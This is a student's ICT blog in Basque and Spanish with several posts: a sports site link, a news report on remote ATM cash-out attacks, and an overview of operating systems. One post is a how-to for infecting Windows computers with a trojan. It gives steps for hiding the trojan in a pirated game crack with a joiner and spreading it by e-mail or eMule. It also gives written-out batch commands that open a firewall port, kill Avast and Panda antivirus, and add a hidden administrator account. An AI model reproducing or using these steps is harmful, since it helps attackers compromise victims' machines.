Kaixo!

Ni Xabier Vidriales naiz eta hau nire IKT-ko blogg-a izango da.

lunes, 3 de abril de 2017

Gure Web horrialdea

Azken asteotan, kirolei buruzko web horrialde bat egin dugu. Horrialde hau astero egueratuko da jaurdunaldiko momentu interesgarrienekin. Hemen daukazue linka:

lunes, 12 de diciembre de 2016

Como infectar un ordenador con un troyano

Pasos para preparar la infección para Windows XP SP2:

 1º Buscamos un troyano, son fáciles de encontrar, google es nuestro mejor aliado. En este caso he usado uno muy sencillo y eficaz Cabronator 3.

 2º Buscamos un Joiner, una herramienta que sirve para juntar los archivos ejecutables y hacer que uno se ejecute visible y otros invisibles. En este caso e usado Cactus Joiner 2.0 sacado de elhacker, un joiner que permite juntar 25 archivos y encryptarlos de forma que un antivirus no puede detectar virus adjuntos, hasta el momento de su ejecución.

 3º Un cebo, un crack de algún juego que este de moda. Este crack será lo que juntemos con el troyano y un archivo bat para hacer mas eficaz el troyano.

 4º Nos preparamos un bat que pueda abrir los puertos del troyano y desactive el antivirus. El bat del ejemplo solo desactiva el Panda y el Avast! pero se puede hacer con todos los antivirus.


Ejemplo:

Esta linea abre el puerto del troyano en el firewall de windows Xp:
netsh firewall set portopenig tcp 5555 tcp5555 enable

Estas lineas desactivan el antivirus Avast!:
taskkill /f /im ashserv.exe
taskkill /f /im ashdisp.exe
taskkill /f /im ashmaisv.exe
net stop avast! Antivirus
net stop avast! iAVS4 Control Service
net stop avast! Mail Scanner
net stop avast! Web Scanner

Estas el Panda:
taskkill /f /im APVXDWIN.EXE
net stop Panda anti-virus service

Estas crean el usuario Alvaro con contraseña hola y le da privilegios:
net user Alvaro hola /add
net localgroup administradores Alvaro /add

 5º Despues juntamos el bat, el troyano y el cebo con el joiner y elegimos que todo se ejecute oculto menos el cebo en este caso un crack de un juego.

 6º Solo nos queda un medio de difusión: e-mail, emule …
Este es un modelo de infección muy básico, aunque el joiner oculte el troyano cuando sedescomprima el antivirus lo detectaría, pero al ejecutarse el bat desactiva el antivirus, con el inconveniente de que cuando se reinicie la maquina el antivirus se volverá activar y encontrara el virus.

 Cactus Joiner 2.0

Troyano Cabronator 3 información

Troyano Cabronator 3 descargar

miércoles, 30 de noviembre de 2016

Un grupo de ‘crackers’ ataca cajeros para que expulsen billetes de forma remota

Los bancos se enfrentan a una nueva amenaza en ciberseguridad que permite a los atacantes extraer grandes cantidades de efectivo de varios cajeros a la vez.

Un grupo de cibercriminales ha atacado los cajeros de más de una docena de países en Europa este año para que expulsen efectivo de forma fraudulenta y remota a través de un ataque informático centralizado, lo que supone un serio quebradero de cabeza para los bancos.

No se realiza ninguna modificación en los cajeros, pero los billetes son expulsados como por arte de magia. Entre los países afectados se encuentran Armenia, Reino Unido, Bulgaria, Polonia, Países bajos, Rusia o España, según el informe de Group IB, una compañía multinacional con sede en Moscú especializada en prevenir e investigar el fraude y crimen en la Red. La compañía no ha hecho públicos los nombres de los bancos afectados.

“Los delincuentes siempre han buscado la manera de aumentar su botín y disminuir los riesgos que conlleva obtenerlo. Por eso han cambiado su modus operandi: del ataque físico al ataque lógico”, dice la firma de seguridad.

El atraco de cajeros es una práctica relativamente común y sencilla de investigar, gracias a que se requiere acceso físico a ellos. Los golpes cometidos recientemente en bancos de Europa y Asia han sido comandados de forma remota y centralizada, afectando a numerosos cajeros a la vez, lo que ha permitido sustraer grandes cantidades de dinero antes de que los bancos puedan actuar.

Los ciberatacantes entran en la red del banco que otorga el control de los cajeros para hacer que dispensen el efectivo. Gracias a dicho control, pueden elegir la hora exacta en la que se expulsan los billetes lo que les permite realizar grandes operaciones organizadas con las que sustraer, en algunos casos, millones de dólares.

Dos fabricantes de cajeros, Diebold Nixdorf y NCR Corp, ya están trabajando en el caso, según sus declaraciones a Reuters “Han llevado sus operaciones al siguiente nivel, ahora pueden atacar un gran número de máquinas a la vez”, dice Nicholas Biellett, el director de software y seguridad de cajeros en Diebold Nixdorf. “Saben que se les detectará rápido, así que cogen todo el efectivo que pueden de todos los cajeros posibles antes de que se detengan por actividad inusual”.

Group IB advierte que las herramientas empleadas no requieren una gran inversión ya que sus códigos suelen estar accesibles públicamente en Internet.


¿Cómo obtienen el control?


Para acceder a la intranet de los bancos, los cibercriminales envían emails haciéndose pasar por otros grupos bancarios o cajas. En ellos se adjuntan archivos comprometidos o ejecutables que para el receptor parecen documentación.

“Los atacantes tardan entre 10 minutos y una semana en tomar el control total de una intranet y sus cajeros”, dice Group IB en su reporte. Basta una simple llamada desde el servidor remoto para hacer que un cajero emita billetes hasta quedarse vacío. En cuanto termina la operación, los atacantes borran todos los registros para dificultar la investigación de los expertos de seguridad de los cajeros y bancos.

Group IB cree que el software empleado para hacer que los cajeros expulsen dinero bajo demanda es único y solo está siendo empleado por una banda criminal.

El golpe es difícil de investigar, ya que el dinero se recoge en persona. Habitualmente, los fraudes financieros se resuelven siguiendo el dinero que se mueve de una cuenta a otra, algo imposible de hacer con esta novedosa práctica.

"Se espera que este tipo de ataques sean una de las amenazas claves contra los bancos: permiten a los cibercriminales cometer fraudes remotamente desde cualquier punto y atacar la red de cajeros sin ser detectados por el 'radar' de los servicios de seguridad", advierte Dmitry Volkov, jefe del departamento de investigación en Group IB.
Podéis ver la noticia completa en esta pagina 

viernes, 18 de noviembre de 2016

Sistema Eragileak

Sistema eragilea ordenagailuak duen software funtzezkoena da. Erabiltzailea ordenagailuarekin komunikatzen duela esan daiteke. Ordenagailuaren hardwarea kudeatzen du eta beste programak batzuk funtzionatzea ahalbidetzen du. Hainbat motatako sistema eragileak daude eta hauek dira erabilienak:

Apple Mac: Apple-ek bere ordenagailuentzako diseinatutako sistema hau oso alternatiba ona da windows-a erabil nahi ez duten pertsonentzako baina nahiko garestiak dira Apple-en ordenagailuak. Hemen daukazuen apple-en orrialdea.


mac bilaketarekin bat datozen irudiak


Microsoft Windows: Sistema eragile erabiliena da baina, modu legalean sistema eragilea instalatzeko ordaindu egin beharko duzu. Windows-en orrialde ofiziala.

windows bilaketarekin bat datozen irudiak


GNU/Linux: Software libre dela da bere abantaila handiena, hau da, ez da soilik ez dela ordaindu behar sistema eragileagaitik, zute gustura modifikatu ahalko duzula baizik. Honi buruz, informazio gehiago irakurri nahi baduzue bisitatu linux-en foroa.
linux bilaketarekin bat datozen irudiak

Gure ordanagailuan jarri dugun sistema linux-ekoa izan da software librea delako. Puppy izeneko sistema daukagu gure ordanagailuaren ezaugarriei hobeto egokitzen dena delako eta oraingoz, oso ondo funtzionatzen digu. Gainera, beste sistema alternatibo bat daukagu, windows-a. Sistema hau instalatuta zetorren baina  hainbat proba egin ondoren linux-ekoa hobeto zioala konturatu ginen eta hau erabiltzen  dugu. Guk erabilitako sistema deskargatu nahi baduzue hemen daukauze link-a.